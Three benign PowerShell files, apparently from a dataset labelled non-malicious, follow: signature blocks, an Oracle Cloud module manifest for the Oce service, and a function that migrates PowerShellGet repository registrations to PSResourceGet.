# BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCD3ltb/2BnFhUO6viPihGMlL7YrIANytS6S
# Yc1y2HMHPgIGZjK/djhDGBMyMDI0MDUxNjA2NDIxNS4zNTZaMASAAgH0oIHRpIHO
# MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL
# ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046OTIwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAecujy+TC08b6QAB
# AAAB5zANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDAeFw0yMzEyMDYxODQ1MTlaFw0yNTAzMDUxODQ1MTlaMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTIwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDCV58v4IuQ659XPM1DtaWM
# v9/HRUC5kdiEF89YBP6/Rn7kjqMkZ5ESemf5Eli4CLtQVSefRpF1j7S5LLKisMWO
# GRaLcaVbGTfcmI1vMRJ1tzMwCNIoCq/vy8WH8QdV1B/Ab5sK+Q9yIvzGw47TfXPE
# 8RlrauwK/e+nWnwMt060akEZiJJz1Vh1LhSYKaiP9Z23EZmGETCWigkKbcuAnhvh
# 3yrMa89uBfaeHQZEHGQqdskM48EBcWSWdpiSSBiAxyhHUkbknl9PPztB/SUxzRZj
# UzWHg9bf1mqZ0cIiAWC0EjK7ONhlQfKSRHVLKLNPpl3/+UL4Xjc0Yvdqc88gOLUr
# /84T9/xK5r82ulvRp2A8/ar9cG4W7650uKaAxRAmgL4hKgIX5/0aIAsbyqJOa6OI
# GSF9a+DfXl1LpQPNKR792scF7tjD5WqwIuifS9YUiHMvRLjjKk0SSCV/mpXC0BoP
# kk5asfxrrJbCsJePHSOEblpJzRmzaP6OMXwRcrb7TXFQOsTkKuqkWvvYIPvVzC68
# UM+MskLPld1eqdOOMK7Sbbf2tGSZf3+iOwWQMcWXB9gw5gK3AIYK08WkJJuyzPqf
# itgubdRCmYr9CVsNOuW+wHDYGhciJDF2LkrjkFUjUcXSIJd9f2ssYitZ9CurGV74
# BQcfrxjvk1L8jvtN7mulIwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM/+4JiAnzY4
# dpEf/Zlrh1K73o9YMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G
# A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs
# BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0
# LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH
# AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB0ofDbk+llWi1c
# C6nsfie5Jtp09o6b6ARCpvtDPq2KFP+hi+UNNP7LGciKuckqXCmBTFIhfBeGSxvk
# 6ycokdQr3815pEOaYWTnHvQ0+8hKy86r1F4rfBu4oHB5cTy08T4ohrG/OYG/B/gN
# nz0Ol6v7u/qEjz48zXZ6ZlxKGyZwKmKZWaBd2DYEwzKpdLkBxs6A6enWZR0jY+q5
# FdbV45ghGTKgSr5ECAOnLD4njJwfjIq0mRZWwDZQoXtJSaVHSu2lHQL3YHEFikun
# bUTJfNfBDLL7Gv+sTmRiDZky5OAxoLG2gaTfuiFbfpmSfPcgl5COUzfMQnzpKfX6
# +FkI0QQNvuPpWsDU8sR+uni2VmDo7rmqJrom4ihgVNdLaMfNUqvBL5ZiSK1zmaEL
# BJ9a+YOjE5pmSarW5sGbn7iVkF2W9JQIOH6tGWLFJS5Hs36zahkoHh8iD963LeGj
# ZqkFusKaUW72yMj/yxTeGEDOoIr35kwXxr1Uu+zkur2y+FuNY0oZjppzp95AW1le
# hP0xaO+oBV1XfvaCur/B5PVAp2xzrosMEUcAwpJpio+VYfIufGj7meXcGQYWA8Um
# r8K6Auo+Jlj8IeFS6lSvKhqQpmdBzAMGqPOQKt1Ow3ZXxehK7vAiim3ZiALlM0K5
# 46k0sZrxdZPgpmz7O8w9gHLuyZAQezCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb
# SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
# EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
# ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj
# YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy
# NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT
# B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE
# AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI
# yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo
# YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y
# aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v
# 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG
# ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS
# kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr
# bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM
# jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL
# W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF
# emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu
# rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE
# FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn
# G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW
# M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5
# Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi
# AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV
# 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js
# Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx
# MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2
# LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv
# 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn
# OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1
# bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4
# rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU
# 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF
# NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/
# HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU
# CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi
# excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm
# dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq
# ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp
# Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAtMDVF
# MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK
# AQEwBwYFKw4DAhoDFQCzcgTnGasSwe/dru+cPe1NF/vwQ6CBgzCBgKR+MHwxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv
# c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6e+yFzAi
# GA8yMDI0MDUxNTIyMTM0M1oYDzIwMjQwNTE2MjIxMzQzWjB0MDoGCisGAQQBhFkK
# BAExLDAqMAoCBQDp77IXAgEAMAcCAQACAhGgMAcCAQACAhOEMAoCBQDp8QOXAgEA
# MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI
# AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAF44a9QWeg+Id3E41o5OjaE8ULcI
# 8vkJsSmXGxbc8sOzU9n7UL8M6RXvpAkdZayoysJAjFrjUwJaXba+hM5cgAaRSvoW
# u84aQwo6rOwIEY0PZuYcVvHj0tlXVKEg+or8ccIHarYCY6ff/V3LcPNFbZWa8KwD
# yq+/nhjNVW7hF95PNLJhWgxK+Lw5738SOaD9mi44E5a4jFa7asoJXMbPvdOKqa5N
# dIZLHGoIBVacxjW+qUIwlyys3Q31KOSOjKr26BOnAvKBZBP9xkGvhDu+AY/eUgl0
# MqOCp6+gq1yvArDj/S+94D263+l8WNjPIYI8NCRnrn1eT4CafQCe5vXnhDMxggQN
# MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ
# MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
# MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAecu
# jy+TC08b6QABAAAB5zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G
# CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCC9XG/qd3Ojs2RrNiAQUURSB00U
# GH5w8vf9SHMPdEUqBzCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIOU2XQ12
# aob9DeDFXM9UFHeEX74Fv0ABvQMG7qC51nOtMIGYMIGApH4wfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAHnLo8vkwtPG+kAAQAAAecwIgQgAGwI1c5z
# snT9VKpcsRCD4yUbFLrv5RCjtdMGM/z1PFswDQYJKoZIhvcNAQELBQAEggIAV0Cr
# R4QT3LDA/Qaa8aRHv3c1ZsBVaWpLE7CXhCz/XMTAY4vB2Qhtgxw7z5hEy7f+X07k
# 4+UYRZ5jTDh/+3fryc3qBfL7NxZSHoqGUEgo5LrrI4ilE/IAwXwlwjsqkDzCeErM
# f37bV1AZczXUvLI2fRn3JelYvgU+ya7wdpCO3DtgL/05TBrnTXWU0tHUSfV/x8uv
# pda0RHqDZUgkvGbLHFT7K4qD6posPT8K3nzHo8wVz7f7HWqZoUQcaf1gj5KmAjb2
# mhBbd1ocuhpfWCeVcL9kCCTu3mAFLFiRaDVdMmj8ELl4Dn1g/bW685rUNcNHX420
# twIFRiwfW3EmvkXTc+ul7DGoZkmWJu4xST8hDEhVlDhuUI05F0oKxx2QgliDNSdA
# ns8Z/U+vTTkkmh6NDCZdGGWjWvYt+d/YsvN5DlVFQijRUVaH+ydzQhAQ1DnUolZT
# RdijyJI0pTyJje9jk8H/3hDb1aqov0pJ57taZatmLQ2u1lg8RpqLGyeZR+OKst5g
# wCt2VZoKUzeVIc61FMQ5gk7H2v2/C2aNpSMIXJ3yIxPGwzM9fmGhviaF6k2Homc6
# ttAdcE8/00cPuQzG5JnVFx9zS4NWIPEiP5nWWJiNaA1QqB3yveNFSoPG9q6oiqW/
# B6Dc7ocVx1djpe2dCe9E6FS6Wa+ORWgiWBSe6ec=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_18_31.ps1
|
sample_18_31.ps1
|
#
# Module manifest for module 'OCI.PSModules.Oce'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Oce.dll'
# Version number of this module.
ModuleVersion = '79.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '044c91ad-abeb-41a8-9bf6-cf7d46964003'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Oce Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '79.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Oce.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIOceInstance', 'Get-OCIOceInstancesList',
'Get-OCIOceWorkRequest', 'Get-OCIOceWorkRequestErrorsList',
'Get-OCIOceWorkRequestLogsList', 'Get-OCIOceWorkRequestsList',
'Move-OCIOceInstanceCompartment', 'New-OCIOceInstance',
'Remove-OCIOceInstance', 'Update-OCIOceInstance'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Oce'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_22_69.ps1
|
sample_22_69.ps1
|
<#
.SYNOPSIS
Finds the repositories registered with PowerShellGet and registers them for PSResourceGet.
#>
function Import-PSGetRepository {
[CmdletBinding(SupportsShouldProcess, ConfirmImpact = 'Medium')]
param(
# Use the -Force switch to overwrite existing repositories.
[switch]$Force
)
$Runtime = [System.Runtime.InteropServices.RuntimeInformation]
$OSPlatform = [System.Runtime.InteropServices.OSPlatform]
# this checks for WindowsPwsh and Core
$IsOSWindows = $Runtime::IsOSPlatform($OSPlatform::Windows)
if ($IsOSWindows) {
$PSGetAppLocalPath = Microsoft.PowerShell.Management\Join-Path -Path $env:LOCALAPPDATA -ChildPath 'Microsoft\Windows\PowerShell\PowerShellGet\'
}
else {
$PSGetAppLocalPath = Microsoft.PowerShell.Management\Join-Path -Path ([System.Management.Automation.Platform]::SelectProductNameForDirectory('CACHE')) -ChildPath 'PowerShellGet'
}
$PSRepositoriesFilePath = Microsoft.PowerShell.Management\Join-Path -Path $PSGetAppLocalPath -ChildPath "PSRepositories.xml"
$PSGetRepositories = Microsoft.PowerShell.Utility\Import-Clixml $PSRepositoriesFilePath -ea SilentlyContinue
Microsoft.PowerShell.Utility\Write-Verbose ('Found {0} registered PowerShellGet repositories.' -f $PSGetRepositories.Count)
if ($PSGetRepositories.Count) {
$repos = @(
$PSGetRepositories.Values |
Microsoft.PowerShell.Core\Where-Object {$_.PackageManagementProvider -eq 'NuGet'-and $_.Name -ne 'PSGallery'} |
Microsoft.PowerShell.Utility\Select-Object Name, Trusted, SourceLocation
)
Microsoft.PowerShell.Utility\Write-Verbose ('Selected {0} NuGet repositories.' -f $repos.Count)
if ($repos.Count) {
$repos | Microsoft.PowerShell.Core\ForEach-Object {
try {
$message = 'Registering {0} at {1} -Trusted:${2} -Force:${3}.' -f $_.Name,
$_.SourceLocation, $_.Trusted, $Force
if ($PSCmdlet.ShouldProcess($message, $_.Name, 'Register-PSResourceRepository')) {
$registerPSResourceRepositorySplat = @{
Name = $_.Name
Uri = $_.SourceLocation
Trusted = $_.Trusted
PassThru = $true
Force = $Force
ApiVersion = if ([Uri]::new($_.SourceLocation).Scheme -eq 'file') {'local'} else {'v2'}
}
Register-PSResourceRepository @registerPSResourceRepositorySplat
}
}
catch [System.Management.Automation.PSInvalidOperationException] {
if ($_.Exception.Message -match 'already exists') {
Microsoft.PowerShell.Utility\Write-Warning $_.Exception.Message
Microsoft.PowerShell.Utility\Write-Warning 'Use the -Force switch to overwrite existing repositories.'
}
else {
throw $_.Exception
}
}
}
}
}
}
# SIG # Begin signature block
# MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCGbRVCjkuAuO6c
# hfY4EYA5iYXKrjQAEex9jeBBac8pz6CCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
